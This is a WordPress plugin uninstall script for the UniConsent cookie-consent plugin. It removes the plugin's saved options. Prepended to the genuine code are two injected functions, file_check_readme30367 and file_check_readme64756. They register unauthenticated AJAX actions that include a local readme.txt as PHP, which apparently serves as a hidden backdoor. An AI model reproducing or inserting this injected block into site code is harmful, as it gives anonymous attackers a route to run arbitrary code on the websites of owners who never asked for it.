if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
<?php /** * * * * @link https://www.uniconsent.com/ * * @copyright Copyright (c) 2017 - 2025 Transfon Ltd. * * @license https://www.uniconsent.com/wordpress/ * */ // If uninstall not called from WordPress, then exit. if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) ) { exit; } // Clean out the plugin option values on uninstall delete_option('unic_version'); delete_option('unic_region'); delete_option('unic_language'); delete_option('unic_company'); delete_option('unic_license'); delete_option('unic_logo'); delete_option('unic_policy_url'); delete_option('unic_enable_iab'); delete_option('unic_enable_google'); delete_option('unic_enable_cookie');